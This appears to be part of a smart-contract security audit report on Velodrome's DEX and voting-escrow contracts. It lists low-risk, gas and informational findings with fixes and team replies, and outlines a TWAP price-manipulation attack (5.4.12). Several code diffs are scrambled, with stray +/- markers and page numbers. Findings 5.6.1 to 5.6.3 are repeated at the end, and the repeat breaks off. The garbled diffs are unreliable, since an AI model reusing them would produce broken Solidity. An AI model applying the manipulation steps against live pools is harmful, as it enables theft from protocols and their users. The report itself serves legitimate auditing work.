Description: This should cause dust losses which are marginal but are never queued back. See private link to code-423n4/2022-10-3xcalibur-findings#410, vs. the SNX implementation, which does queue the dust back. Users may be diluted by distributing the _leftover amount over another epoch period of length DURATION if the total supply deposited in the gauge continues to increase over this same period. On the flip side, they may also benefit if users withdraw funds from the gauge during the same epoch.

Recommendation: Re-queuing the totalBalance on each notifyRewardAmount should allow re-using those dust amounts. Additionally, these dust amounts are going to be hard to deal with, because you may have rewards from older epochs, meaning that re-queuing the balance on the contract would cause a double-spend. Napkin math suggests the loss is very marginal (an upper bound of one wei of rounding per second, per gauge, over a year), assuming:

WEEK = 60 * 60 * 24 * 7 = 604800
GAUGES = 50
WEEKS = 52
WEEK * GAUGES * WEEKS = 1572480000
1572480000 / 1e18 = 1.57248e-9

Velodrome: I was under the impression that re-queueing balanceOf would cause losses, as not all emissions will necessarily be claimed.

Spearbit: "I was under the impression that re-queueing balanceOf would cause losses as not all emissions will necessarily be claimed" - Yes, that's probably a bigger issue than the marginal rounding. Recommend you check dust on a few of the most used gauges; if it's in marginal amounts, it's probably not worth fixing.

Velodrome: It is difficult to check with the prior gauges as there are always unclaimed rewards, but following the math, and given that the token will always be 18 decimals and the divisor always <= 604800 (seconds in a week), the losses will be minimal.

Spearbit: Acknowledged.

+5.4.6 All rewards are lost until Gauge or Bribe deposits are non-zero

Severity: Low Risk

Context: Gauge.sol#L123-L128

Description: Flagging this old finding, which is still valid for all SNX-like gauges. See private link to code-423n4/2022-10-3xcalibur-findings#429. Because the rewards are emitted over DURATION, if no deposit has happened and notifyRewardAmount() is called with a non-zero value, all rewards will be forfeited until totalSupply is non-zero, as nobody will be able to claim them.

Recommendation: Document this risk to end users and tell them to deposit before voting on a gauge.

Velodrome: To confirm the issue (as I cannot see the findings): if a gauge has no LP tokens deposited, and notifyRewardAmount is called with a non-zero value, some amount of tokens will be trapped as no one can claim them. Will add documentation. I think in general users will deposit if there are potential emissions to collect (as the voting occurs in the week prior, and the emissions only get notified the following week).

Spearbit: Acknowledged.

+5.4.7 Difference in getPastTotalSupply and propose

Severity: Low Risk

Context: VeloGovernor.sol#L45-L48

Description: The getPastTotalSupply() function currently uses block.number, but OpenZeppelin's propose() function will use votes from block.timestamp - 1, as seen here. This could enable:

• Front-running to increase the total supply and cause the proposer to be unable to propose().
• Requiring more tokens than expected if the total supply can grow within one block.

Proposals could be denied as long as a whale is willing to lock more tokens to increase the total supply and thereby increase the proposal threshold.

Recommendation: Consider computing the total supply and votes values in the same block.
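A sketch of measuring both values at the same timepoint (hypothetical override; per the description, OZ's propose() reads the proposer's votes at block.timestamp - 1):

// Sketch: derive the proposal threshold from the total supply at the same
// timepoint used for the proposer's votes, so a same-block supply change
// cannot skew the comparison.
function proposalThreshold() public view override returns (uint256) {
    return (token.getPastTotalSupply(block.timestamp - 1) * proposalNumerator) / PROPOSAL_DENOMINATOR;
}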
Velodrome: Fixed in commit 08c2bcc.

Spearbit: Verified.

+5.4.8 Delaying update_period may award more emissions

Severity: Low Risk

Context: Minter.sol#L87

Description: The first nudge can be performed in the first tail period, so delaying update_period() may award more emissions: because of the possible delay with the first proposal, waiting to call update_period() will allow the use of the updated, nudged value. This is marginal (1 BPS in difference).

Recommendation: Consider documenting this behavior or enforcing a separation between nudge and update_period.

Velodrome: To clarify, the issue is that update_period can be delayed until after nudge, thus allowing for potentially more (or less) emissions? Documentation is fine, but I will also note that update_period is a target for keeper automation, which should reduce the likelihood of this.

Spearbit: Acknowledged. Additionally, you could end up nudging before or after calling update_period, which would impact emissions by 1 BPS.

+5.4.9 Incorrect math for future factories and pools

Severity: Low Risk

Context: Router.sol#L673-L700

Description: Because quoteLiquidity() assumes an x * y = k formula, its quote value will be incorrect when using a custom factory that uses a different curve.

//Router.sol#L673-L700
function _quoteZapLiquidity(
    address tokenA,
    address tokenB,
    bool stable,
    address _factory,
    uint256 amountADesired,
    uint256 amountBDesired,
    uint256 amountAMin,
    uint256 amountBMin
) internal view returns (uint256 amountA, uint256 amountB) {
    require(amountADesired >= amountAMin);
    require(amountBDesired >= amountBMin);
    (uint256 reserveA, uint256 reserveB) = getReserves(tokenA, tokenB, stable, _factory);
    if (reserveA == 0 && reserveB == 0) {
        (amountA, amountB) = (amountADesired, amountBDesired);
    } else {
        uint256 amountBOptimal = quoteLiquidity(amountADesired, reserveA, reserveB);
        if (amountBOptimal <= amountBDesired) {
            require(amountBOptimal >= amountBMin, "Router: insufficient B amount");
            (amountA, amountB) = (amountADesired, amountBOptimal);
        } else {
            uint256 amountAOptimal = quoteLiquidity(amountBDesired, reserveB, reserveA);
            assert(amountAOptimal <= amountADesired);
            require(amountAOptimal >= amountAMin, "Router: insufficient A amount");
            (amountA, amountB) = (amountAOptimal, amountBDesired);
        }
    }
}

The math may be incorrect for future factories and pools: while the current math is valid for x * y = k, any new AMM math (e.g. bounded / V3 math, Curve V2, oracle-driven AMMs) may turn out to be incorrect. This may cause issues when performing zaps with custom factories.

Recommendation: Consider whether custom factories should use zaps, and consider extending the code to allow custom factories to specify their own quoteLiquidity() implementation.

Velodrome: We are aware of this issue. Future factories will have different parameters for swaps / adding and removing liquidity and will likely require a different router, so a separate router will be created for those. I guess we can make it clearer in the documentation that this will be used exclusively for the current stable/volatile pair implementation. Indeed, the router implementation will evolve based on the pool implementation. I agree that the docs should communicate this clearly.

Spearbit: Acknowledged.

+5.4.10 Add function to remove whitelisted token and NFT

Severity: Low Risk

Context: Voter.sol

Description: In the Voter contract, the governor can only add tokens and NFTs to the whitelist. However, it is missing the functionality to remove whitelisted tokens and NFTs. If any whitelisted token or NFT has an issue, it cannot be removed from the list.
Recommendation: It is recommended to add the remove functionality, which could be done with the following change:

- function whitelistToken(address _token) external {
+ function whitelistToken(address _token, bool _enable) external {
      require(_msgSender() == governor, "Voter: not governor");
-     _whitelistToken(_token);
+     _whitelistToken(_token, _enable);
  }

- function _whitelistToken(address _token) internal {
+ function _whitelistToken(address _token, bool _enable) internal {
-     require(!isWhitelistedToken[_token], "Voter: token already whitelisted");
-     isWhitelistedToken[_token] = true;
-     emit WhitelistToken(_msgSender(), _token);
+     isWhitelistedToken[_token] = _enable;
+     emit WhitelistToken(_msgSender(), _token, _enable);
  }

- function whitelistNFT(uint256 _tokenId) external {
+ function whitelistNFT(uint256 _tokenId, bool _enable) external {
      address _sender = _msgSender();
      require(_sender == governor, "Voter: not governor");
-     require(!isWhitelistedNFT[_tokenId], "Voter: nft already whitelisted");
-     isWhitelistedNFT[_tokenId] = true;
-     emit WhitelistNFT(_sender, _tokenId);
+     isWhitelistedNFT[_tokenId] = _enable;
+     emit WhitelistNFT(_sender, _tokenId, _enable);
  }

Velodrome: This issue has been fixed in commit 2ace8b.

Spearbit: Verified.

+5.4.11 Unnecessary approve in Router

Severity: Low Risk

Context: Router.sol#L656-L657, Router.sol#L712

Description: The newly added zap feature uses max approvals, which are granted to pairs. However, the Pair contract does not pull tokens from the router, so the router's approve() calls are unnecessary. Because of the possibility of specifying a custom factory, attackers will be able to set up approvals from any token to their contracts. This may be used to scam end users, for example by performing a swap through these malicious factories.

Recommendation: While no attack was identified, the usage of max approvals may be too liberal. A more cautious approach would be to set the allowance to the exact value necessary and then reset it back to 0. Alternatively, do not give any allowance to the pair.

Velodrome: Fixed in commit c799c6.

Spearbit: Verified.

+5.4.12 The current value of a Pair is not always returning a 30-minute TWAP and can be manipulated

Severity: Low Risk

Context: Pair.sol#L276-L288

Description: The current function returns a current TWAP. It fetches the last observation and calculates the TWAP since that observation. An observation is pushed every thirty minutes. However, the interval between the current timestamp and the last observation varies a lot; in most cases, the TWAP interval is shorter than 30 minutes.

//Pair.sol#L284-L288
uint256 timeElapsed = block.timestamp - _observation.timestamp; // @audit: timeElapsed can be much smaller than 30 minutes.
uint256 _reserve0 = (reserve0Cumulative - _observation.reserve0Cumulative) / timeElapsed;
uint256 _reserve1 = (reserve1Cumulative - _observation.reserve1Cumulative) / timeElapsed;
amountOut = _getAmountOut(amountIn, tokenIn, _reserve0, _reserve1);

If the last observation was newly pushed, timeElapsed will be much shorter than 30 minutes, and the cost of price manipulation is cheaper in this case. Assume the last observation is updated at T. The exploiter can launch an attack at T + 30_MINUTES - 1:

1. At T + 30_MINUTES - 1, the exploiter manipulates the price of the pair. Assume the price is moved to 100x.
2. At T + 30_MINUTES, the exploiter pokes the pair. The pair pushes an observation with the price = 100x.
3. At T + 30_MINUTES + 1, the exploiter exploits external protocols. The current function fetches the last observation and calculates the TWAP between the last observation and the current price. It ends up calculating a two-block-interval TWAP.

Recommendation: There are two possible mitigations:

1. Check whether external protocols are using the current function. We shall document and inform external protocols of this potential risk.
2. If the current function is not popular, consider removing it. An alternative solution is a lastTWAP that always calculates the TWAP based on the last two observations. As the time elapsed between two observations is always larger than 30 minutes, the manipulation cost is guaranteed to be high.
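A sketch of such a lastTWAP (hypothetical; assumes the Pair's observations array with at least two entries and the cumulative-reserve bookkeeping shown above):

// Sketch: quote against the two most recent observations, whose spacing is
// always >= 30 minutes, instead of the (possibly very short) window since
// the last observation.
function lastTWAP(address tokenIn, uint256 amountIn) external view returns (uint256 amountOut) {
    uint256 len = observations.length;
    Observation memory _o0 = observations[len - 2];
    Observation memory _o1 = observations[len - 1];
    uint256 timeElapsed = _o1.timestamp - _o0.timestamp;
    uint256 _reserve0 = (_o1.reserve0Cumulative - _o0.reserve0Cumulative) / timeElapsed;
    uint256 _reserve1 = (_o1.reserve1Cumulative - _o0.reserve1Cumulative) / timeElapsed;
    amountOut = _getAmountOut(amountIn, tokenIn, _reserve0, _reserve1);
}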
It's worth mentioning that the cost of multiple-block MEV and manipulation varies among different chains. The trustworthiness of a TWAP relies on the block producer/sequencer, and the mechanism is not transparent on many Layer 2 and alternative Layer 1 chains. Also, two-block manipulation is believed to be practical on Ethereum, and it's likely that all L2 chains will move toward this model: chainsecurity.com/oracle-manipulation-after-merge. As a result, it's recommended to be conservative when using a TWAP.

Velodrome: I think I am okay with removing current to prevent other protocols from using it inappropriately. Will check with the team. Fixed in commit fc936a.

Spearbit: Verified.

+5.4.13 Calculation error of getAmountOut leads to revert of Router

Severity: Low Risk

Context: Pair.sol#L450-L476

Description: The function getAmountOut in Pair calculates the correct swap amount and token price.

//Pair.sol#L442-L444
function _f(uint256 x0, uint256 y) internal pure returns (uint256) {
    return (x0 * ((((y * y) / 1e18) * y) / 1e18)) / 1e18 + (((((x0 * x0) / 1e18) * x0) / 1e18) * y) / 1e18;
}

//Pair.sol#L450-L476
function _get_y(
    uint256 x0,
    uint256 xy,
    uint256 y
) internal pure returns (uint256) {
    for (uint256 i = 0; i < 255; i++) {
        uint256 y_prev = y;
        uint256 k = _f(x0, y);
        if (k < xy) {
            uint256 dy = ((xy - k) * 1e18) / _d(x0, y);
            y = y + dy;
        } else {
            uint256 dy = ((k - xy) * 1e18) / _d(x0, y);
            y = y - dy;
        }
        if (y > y_prev) {
            if (y - y_prev <= 1) {
                return y;
            }
        } else {
            if (y_prev - y <= 1) {
                return y;
            }
        }
    }
    return y;
}

getAmountOut is not always correct. This results in the router unexpectedly reverting a regular and correct transaction. We can find a parameter for which the router fails to swap within 5 seconds of fuzzing:

function testAmountOut(uint swapAmount) public {
    vm.assume(swapAmount < 1_000_000_000 ether);
    vm.assume(swapAmount > 1_000_000);
    uint256 reserve0 = 100 ether;
    uint256 reserve1 = 100 ether;
    uint amountIn = swapAmount - swapAmount * 2 / 10000;
    uint256 amountOut = _getAmountOut(amountIn, token0, reserve0, reserve1);
    uint initialK = _k(reserve0, reserve1);
    reserve0 += amountIn;
    reserve1 -= amountOut;
    console.log("initial k:", initialK);
    console.log("curent k:", _k(reserve0, reserve1));
    console.log("curent smaller k:", _k(reserve0, reserve1 - 1));
    require(initialK < _k(reserve0, reserve1), "K");
    require(initialK > _k(reserve0, reserve1 - 1), "K");
}

The fuzzer finds a counter-example at swapAmount = 1413611527073436. We can test that the Router will revert if given the fuzzed params.
contract PairTest is BaseTest {
    function testRouterSwapFail() public {
        Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true));
        DAI.approve(address(router), 100 ether);
        FRAX.approve(address(router), 100 ether);
        _addLiquidityToPool(
            address(this),
            address(router),
            address(DAI),
            address(FRAX),
            true,
            100 ether,
            100 ether
        );
        uint swapAmount = 1413611527073436;
        DAI.approve(address(router), swapAmount);
        // vm.expectRevert();
        console.log("fee:", factory.getFee(address(pair), true));
        IRouter.Route[] memory routes = new IRouter.Route[](1);
        routes[0] = IRouter.Route(address(DAI), address(FRAX), true, address(0));
        uint daiAmount = DAI.balanceOf(address(pair));
        uint FRAXAmount = FRAX.balanceOf(address(pair));
        console.log("daiAmount: ", daiAmount, "FRAXAmount: ", FRAXAmount);
        vm.expectRevert("Pair: K");
        router.swapExactTokensForTokens(swapAmount, 0, routes, address(owner), block.timestamp);
    }
}

Recommendation: There are two causes of the miscalculation.

1. The function _f gets a different value from _k because of a rounding error:

+   uint256 _a = (x0 * y) / 1e18;
+   uint256 _b = ((x0 * x0) / 1e18 + (y * y) / 1e18);
+   return (_a * _b) / 1e18;
-   return (x0 * ((((y * y) / 1e18) * y) / 1e18)) / 1e18 + (((((x0 * x0) / 1e18) * x0) / 1e18) * y) / 1e18;

2. dy at Pair.sol#L459 gets skewed by the rounding error:

function _get_y(
    uint256 x0, // @audit (amountIn + reserveA) post reserveA
    uint256 xy, // k
    uint256 y   // reserveB
) internal view returns (uint256) {
    for (uint256 i = 0; i < 255; i++) {
        uint256 y_prev = y;
        // @audit _f has a different rounding to _k
        uint256 k = _f(x0, y);
        if (k < xy) {
            // @audit: there are two cases where dy == 0
            // case 1: y has converged and we found the correct answer
            // case 2: _d(x0, y) is too large compared to (xy - k) and the rounding
            //         error screwed us. In this case, we need to increase y by 1
            uint256 dy = ((xy - k) * 1e18) / _d(x0, y);
            if (dy == 0) {
                if (k == xy) {
                    // We found the correct answer. Return y
                    return y;
                }
                if (_k(x0, y + 1) > xy) {
                    // If _k(x0, y + 1) > xy, then we are close to the correct answer.
                    // There's no closer answer than y + 1
                    return y + 1;
                }
                dy = 1;
            }
            y = y + dy;
        } else {
            uint256 dy = ((k - xy) * 1e18) / _d(x0, y);
            if (dy == 0) {
                if (k == xy || _f(x0, y - 1) < xy) {
                    // Likewise, if k == xy, we found the correct answer.
                    // If _f(x0, y - 1) < xy, then we are close to the correct answer.
                    // There's no closer answer than "y"
                    // It's worth mentioning that we need to find y where f(x0, y) >= xy
                    // As a result, we can't return y - 1 even if it's closer to the correct answer
                    return y;
                }
                dy = 1;
            }
            y = y - dy;
        }
    }
    // @audit - should never happen. If it does, it means it doesn't converge within 255 iterations
    // @audit - should assign a custom error to save gas.
    revert("y not found");
}

Velodrome: I have reviewed this and I agree with the finding. We can fix it for the new Pair contracts, but note that, like the "current value of a Pair is not always returning a 30-minute TWAP and can be manipulated" issue, it will only be fixed for new Pair contracts, while old Pair contracts will continue to have the faulty code in them. Fixed in commit 9ca981.

Spearbit: Verified.

+5.4.14 VotingEscrow checkpoints are not synchronized

Severity: Low Risk

Context: VotingEscrow.sol#L1309-L1351, VotingEscrow.sol#L1364-L1415

Description: Delegating token ids does not correctly synchronize the fromBlock variable in the checkpoint; by leaving it not updated, the functions getPastVotesIndex and _findWhatCheckpointToWrite could return an incorrect index.
Recommendation: It is recommended to update the fromBlock variable of the checkpoint in the _moveTokenDelegates and _moveAllDelegates functions.

Velodrome: Fixed in commit a670bf.

Spearbit: Verified.

+5.4.15 Wrong proposal expected value in VeloGovernor

Severity: Low Risk

Context: VeloGovernor.sol#L14-L16

Description: The values of MAX_PROPOSAL_NUMERATOR and proposalNumerator are incorrect. In the current implementation, the max proposal numerator is set to 0.5% while the expected value is 5%, and the proposal numerator starts at 0.2%, not at 0.02% as expected.

Recommendation: It is recommended to fix the values:

- uint256 public constant MAX_PROPOSAL_NUMERATOR = 50; // max 5%
+ uint256 public constant MAX_PROPOSAL_NUMERATOR = 500; // max 5%
  uint256 public constant PROPOSAL_DENOMINATOR = 10_000;
- uint256 public proposalNumerator = 20; // start at 0.02%
+ uint256 public proposalNumerator = 2; // start at 0.02%

Velodrome: Fixed as part of commit 64fe60.

Spearbit: Verified.

+5.4.16 _burn function will always revert if the caller is the approved spender

Severity: Low Risk

Context: VotingEscrow.sol#L556

Description: The owner or the approved spender is allowed to trigger the _burn function. However, whenever an approved spender triggers this function, it will always revert. This is because the _removeTokenFrom function reverts internally if the caller is not the owner of the NFT, as shown below:

function _removeTokenFrom(address _from, uint256 _tokenId) internal {
    // Throws if `_from` is not the current owner
    assert(idToOwner[_tokenId] == _from);

As a result, an approved spender will not be able to withdraw or merge a veNFT on behalf of the owner, because the internal _burn function will always revert.

Recommendation: Update the _burn function to pass the owner's address instead of the caller's address to the _removeTokenFrom function:

function _burn(uint256 _tokenId) internal {
    require(_isApprovedOrOwner(msg.sender, _tokenId), "VotingEscrow: caller is not owner nor approved");
    address owner = ownerOf(_tokenId);
    ..SNIP..
    // Remove token
-   _removeTokenFrom(msg.sender, _tokenId);
+   _removeTokenFrom(owner, _tokenId);
    emit Transfer(owner, address(0), _tokenId);
}

Velodrome: Fixed in commit 7d5a78.

Spearbit: Verified.

5.5 Gas Optimization

+5.5.1 OpenZeppelin's Clones library can be used to cheaply deploy rewards contracts

Severity: Gas Optimization

Context: VotingRewardsFactory.sol, ManagedRewardsFactory.sol, PairFactory.sol#L153, GaugeFactory.sol

Description: OpenZeppelin's Clones library allows for significant gas savings when there are multiple deployments of the same family of contracts. This would prove useful in several factory contracts which commonly deploy the same type of contract. Minimal proxies make use of the same code even when initialization data may be different for each instance. By pointing to an implementation contract, we can delegate all calls to a fixed address and minimise deployment costs.

Recommendation: Consider making use of this library in any of the factory contracts.
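A sketch of the pattern with OpenZeppelin's Clones (hypothetical factory and initializer; real factories would pass their own parameters):

import {Clones} from "@openzeppelin/contracts/proxy/Clones.sol";

interface IPair {
    function initialize(address token0, address token1, bool stable) external;
}

contract PairFactorySketch {
    using Clones for address;

    address public immutable implementation; // full Pair bytecode, deployed once

    constructor(address _implementation) {
        implementation = _implementation;
    }

    function createPair(address tokenA, address tokenB, bool stable) external returns (address pair) {
        // Each pair is an EIP-1167 minimal proxy (~45 bytes) delegating to
        // `implementation`, far cheaper than redeploying the full bytecode.
        pair = implementation.clone();
        IPair(pair).initialize(tokenA, tokenB, stable);
    }
}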
Velodrome: At this stage, we will make this change for the Pair contract as it appears to get the most benefit. For other contracts, we will consider it, but it is a low priority. Fix for pairs in commit cd4698.

Spearbit: Verified.

+5.5.2 VelodromeTimeLibrary functions can be made unchecked

Severity: Gas Optimization

Context: VelodromeTimeLibrary.sol#L7-L14

Description: Running the following fuzz test:

pragma solidity 0.8.13;

import "forge-std/Test.sol";

contract VelodromeTimeLibrary {
    uint256 public constant WEEK = 7 days;

    /// @dev Returns start of epoch based on current timestamp
    function epochStart(uint256 timestamp) public pure returns (uint256) {
        unchecked {
            return timestamp - (timestamp % WEEK);
        }
    }

    /// @dev Returns unrestricted voting window
    function epochEnd(uint256 timestamp) public pure returns (uint256) {
        unchecked {
            return timestamp - (timestamp % WEEK) + WEEK - 1 hours;
        }
    }
}

contract VelodromeTimeLibraryTest is Test {
    VelodromeTimeLibrary vtl;
    uint256 public constant WEEK = 7 days;

    function setUp() public {
        vtl = new VelodromeTimeLibrary();
    }

    function testEpochStart(uint256 timestamp) public {
        uint256 uncheckedVal = vtl.epochStart(timestamp);
        uint256 normalVal = timestamp - (timestamp % WEEK);
        assertEq(uncheckedVal, normalVal);
    }

    function testEpochEnd(uint256 timestamp) public {
        uint256 uncheckedVal = vtl.epochEnd(timestamp);
        uint256 normalVal = timestamp - (timestamp % WEEK) + WEEK - 1 hours;
        assertEq(uncheckedVal, normalVal);
    }
}

one can see that both VelodromeTimeLibrary functions will only start to overflow at a ridiculously high timestamp input.

Recommendation: With that in mind, it would be safe to consider making both VelodromeTimeLibrary functions unchecked.

Velodrome: Fixed in commit eb7f0e.

Spearbit: Verified.
- + require(tail, "Minter: not in tail emissions yet"); require(weekly < TAIL_START, "Minter: not in tail emissions yet"); ... } function update_period() external returns (uint256 _period) { ... - + bool _tail = tail; bool _tail = weekly < TAIL_START; ... } Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 42 +5.5.7 Use a bitmap to store nudge proposals for each epoch Severity: Gas Optimization Context: Minter.sol#L41 Description: The usage of a bitmap implementation for boolean values can save a significant amount of gas. The proposals variable can be indexed by each epoch which should only increment once per week. Recommendation: Consider making use of a bitmap implementation to efficiently pack boolean values. Velodrome: Addressed. Spearbit: The team created a PR to implement the suggestion. +5.5.8 isApproved function optimization Severity: Gas Optimization Context: FactoryRegistry.sol#L63-L69 Description: Because settings are all known, you could do an if-check in memory rather than in storage, by validating first the fallback settings. The recommended implementation will become cheaper for the base case, negligibly more expensive in other cases ~10s of gas Recommendation: Change isApproved function to follow function isApproved( address pairFactory, address votingRewardsFactory, address gaugeFactory ) external view returns (bool) { if ((pairFactory == fallbackPairFactory) && (votingRewardsFactory == fallbackVotingRewardsFactory) && (gaugeFactory == fallbackGaugeFactory) { return true; } return _approved[pairFactory][votingRewardsFactory][gaugeFactory]; + + + + + } By doing this change this check would also be redundant function unapprove( address pairFactory, address votingRewardsFactory, address gaugeFactory ) external onlyOwner { require(_approved[pairFactory][votingRewardsFactory][gaugeFactory], "FactoryRegistry: not approved"); - require( - - - - - ); !((pairFactory == fallbackPairFactory) && (votingRewardsFactory == fallbackVotingRewardsFactory) && (gaugeFactory == fallbackGaugeFactory)), "FactoryRegistry: Cannot delete the fallback route" delete _approved[pairFactory][votingRewardsFactory][gaugeFactory]; emit Unapprove(pairFactory, votingRewardsFactory, gaugeFactory); } Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 43 +5.5.9 Use calldata instead of memory to save gas Severity: Gas Optimization Context: VotingRewardsFactory.sol#L9, Voter.sol#L96 Description: Using calldata avoids copying the value into memory, reducing gas cost Recommendation: Change function variables array from memory to calldata //VotingRewardsFactory - function createRewards(address[] memory rewards) + function createRewards(address[] calldata rewards) //Voter - function initialize(address[] memory _tokens, address _minter) external { + function initialize(address[] calldata _tokens, address _minter) external { Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.5.10 Cache store variables when used multiple times Severity: Gas Optimization Context: SinkManager.sol Description: Storage loads are very expensive compared to memory loads, storage values that are read multiple times should be cached avoiding multiple storage loads. In SinkManager contract use multiple times the storage variable ownedTokenId Recommendation: Cache storage variables that are used multiple times: function convertVELO(uint256 amount) external { + uint256 _ownedTokenId = ownedTokenId; - + require(ownedTokenId != 0, "SinkManager: tokenId not set"); require(_ownedTokenId != 0, "SinkManager: tokenId not set"); ... 
ve.increase_amount(ownedTokenId, amount); ve.increase_amount(_ownedTokenId, amount); - + } ... Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.5.11 Add immutable to variable that don't change Severity: Gas Optimization Context: SinkConverter.sol#L13-L15, SinkManager.sol#L31-L40, FactoryRegistry.sol#L16-L18, Gauge.sol#L24 Description: Using immutable for variables that do not changes helps to save on gas used. The reason has been that immutable variables do not occupy a storage slot when compiled, they are saved inside the contract byte code. Recommendation: Add immutable keyword for each one of the variables in context Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 44 +5.5.12 Use Custom Errors Severity: Gas Optimization Context: Across All Contracts Description: As one can see here: "there is a convenient and gas-efficient way to explain to users why an operation failed through the use of custom errors. Until now, you could already use strings to give more information about failures (e.g., revert("Insufficient funds.");), but they are rather expensive, especially when it comes to deploy cost, and it is difficult to use dynamic information in them." Recommendation: Consider using Custom Errors instead of using error strings, to reduce deployment and run- time cost. This would save both deployment and runtime cost. Velodrome: Partially addressed in commit 9b1f6e for the main contracts. Spearbit: Verified. +5.5.13 Cache array length outside of loop Severity: Gas Optimization Context: Pair.sol#L298, RewardsDistributor.sol#L289, Router.sol#L122, Router.sol#L401, Router.sol#L491, Router.sol#L531, Voter.sol#L385, VotingEscrow.sol#L1293, Voter.sol#L397, VotingEscrow.sol#L1323, VotingEscrow.sol#L1402, GovernorSimple.sol#L336, GovernorSimple.sol#L353, Reward.sol#L237, VotingReward.sol#L11 Voter.sol#L98, Voter.sol#L431, VotingEscrow.sol#L1342, Voter.sol#L335, VotingEscrow.sol#L1242, VotingEscrow.sol#L1379, Router.sol#L549, Voter.sol#L403, Voter.sol#L373, Description: If not cached, the solidity compiler will always read the length of the array during each iteration. That is, if it is a storage array, this is an extra sload operation (100 additional extra gas for each iteration except for the first) and if it is a memory array, this is an extra mload operation (3 additional gas for each iteration except for the first). Recommendation: variable.length. Then add length in place of variable.length in the for loop. Consider simply doing something like so before the for loop: uint length = Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 5.6 Informational +5.6.1 Withdrawing from a managed veNFT locks the user's veNFT for the maximum amount of time Severity: Informational Context: VotingEscrow.sol#L177-L186 Description: A user may deposit their veNFT through the depositManaged() function with any unlock time value. However, upon withdrawing, the unlock time is automatically configured to (block.timestamp + MAXTIME / WEEK) * WEEK. This is poor UX and it does not give users much control over the expiry time of their veNFT. Recommendation: While this may be an intentional design decision, it does not give users much autonomy over their own veNFT after depositing into a managed veNFT. Ensure this is documented and well-understood by all users interacting with the managed veNFT mechanism. Velodrome: This is an intentional design decision and will be made explicit to users in the interface prior to interacting with managed NFTs. Added comments in commit eb7f0e. Spearbit: Acknowledged. 
Velodrome: Fixed in commit eb7f0e.

Spearbit: Verified.

5.6 Informational

+5.6.1 Withdrawing from a managed veNFT locks the user's veNFT for the maximum amount of time

Severity: Informational

Context: VotingEscrow.sol#L177-L186

Description: A user may deposit their veNFT through the depositManaged() function with any unlock time value. However, upon withdrawing, the unlock time is automatically configured to (block.timestamp + MAXTIME / WEEK) * WEEK. This is poor UX and it does not give users much control over the expiry time of their veNFT.

Recommendation: While this may be an intentional design decision, it does not give users much autonomy over their own veNFT after depositing into a managed veNFT. Ensure this is documented and well-understood by all users interacting with the managed veNFT mechanism.

Velodrome: This is an intentional design decision and will be made explicit to users in the interface prior to interacting with managed NFTs. Added comments in commit eb7f0e.

Spearbit: Acknowledged.

+5.6.2 veNFT split functionality can not be disabled

Severity: Informational

Context: VotingEscrow.sol#L1186-L1189

Description: Once split functionality has been enabled via enableSplitForAll(), it is not possible to disable this feature in the future. It does not pose any additional risk to have it disabled once users have already split their veNFTs, because the protocol allows for these locked amounts to be readily withdrawn upon expiry.

Recommendation: Ensure this is documented, or consider adding a disableSplitForAll() function, callable only by the Velodrome team.

Velodrome: Fixed in commit 927cdb.

Spearbit: Verified.

+5.6.3 Anyone can notify the FeesVotingReward contract of new rewards

Severity: Informational

Context: Gauge.sol#L62-L88, BribeVotingReward.sol, Voter.sol#L274-L277

Description: While the BribeVotingReward contract intends to allow bribes from anyone, the FeesVotingReward contract is designed to receive fees from just the Gauge contract. This is inconsistent with other reward contracts like LockedManagedReward.

Recommendation: Ensure this is acceptable behaviour and consider documenting this within FeesVotingReward. Alternatively, it may be worthwhile restricting the notifyRewardAmount() function to be callable only from the Gauge contract.

Velodrome: I think in line with making permissions as restrictive as possible, we can go with restricting notifyRewardAmount for FeesVotingReward to the gauge only. Something like:

require(IVoter(voter).gaugeToFees(sender) == address(this));

Velodrome: Fixed in commit 8de67e.

Spearbit: Verified.

+5.6.4 Missing check in merge if the _to NFT has voted

Severity: Informational

Context: VotingEscrow.sol#L1130

Description: The merge() function is used to combine a _from veNFT into a _to veNFT. It starts with a check on whether the _from veNFT has voted. However, it doesn't check whether the _to veNFT has voted. This will cause the user to have less voting power, leaving rewards and/or emissions on the table, if they don't call poke() or reset(). Although this would only be an issue for an unaware user, an aware user would still have to waste gas on either of the following:

1. An extra call to poke() or reset().
2. Voting with the _to veNFT and then calling merge().

Recommendation: Consider adding the following check:

require(!voted[_to], "VotingEscrow: voted");

Velodrome: This is a known issue. We removed the requirement on _to as it creates a worse user experience (e.g. you may vote and then realize you want to merge, but can't, and have to wait until the next epoch). By not constraining _to, the user has a few more options, with the trade-off being they must call poke() if they merge or risk losing some rewards that epoch. We also made voting (Voter::vote()) much more flexible in that regard. Anybody increasing their veNFT lock amount or merging into their veNFT, or generally those who want to change their vote last minute, are free to do it. The V2 front-end will communicate the need to re-cast votes after:

• merge()
• increaseAmount()
• increaseUnlockTime()

Regarding poke, we will not be adding it to VotingEscrow due to gas concerns. I think regarding this issue, we will leave it as is, as it provides greater flexibility in how users can use their veNFTs. Confirmed with the team.

Spearbit: Acknowledged.
5.6 Informational
+5.6.1 Withdrawing from a managed veNFT locks the user's veNFT for the maximum amount of time
Severity: Informational
Context: VotingEscrow.sol#L177-L186
Description: A user may deposit their veNFT through the depositManaged() function with any unlock time value. However, upon withdrawing, the unlock time is automatically configured to ((block.timestamp + MAXTIME) / WEEK) * WEEK. This is poor UX and it does not give users much control over the expiry time of their veNFT.
Recommendation: While this may be an intentional design decision, it does not give users much autonomy over their own veNFT after depositing into a managed veNFT. Ensure this is documented and well-understood by all users interacting with the managed veNFT mechanism.
Velodrome: This is an intentional design decision and will be made explicit to users in the interface prior to interacting with managed NFTs. Added comments in commit eb7f0e. Spearbit: Acknowledged.
+5.6.2 veNFT split functionality can not be disabled
Severity: Informational
Context: VotingEscrow.sol#L1186-L1189
Description: Once split functionality has been enabled via enableSplitForAll(), it is not possible to disable this feature in the future. Having it enabled poses no additional risk once users have already split their veNFTs, because the protocol allows these locked amounts to be readily withdrawn upon expiry.
Recommendation: Ensure this is documented, or consider adding a disableSplitForAll() function callable only by the Velodrome team.
Velodrome: Fixed in commit 927cdb. Spearbit: Verified.
+5.6.3 Anyone can notify the FeesVotingReward contract of new rewards
Severity: Informational
Context: Gauge.sol#L62-L88, BribeVotingReward.sol, Voter.sol#L274-L277
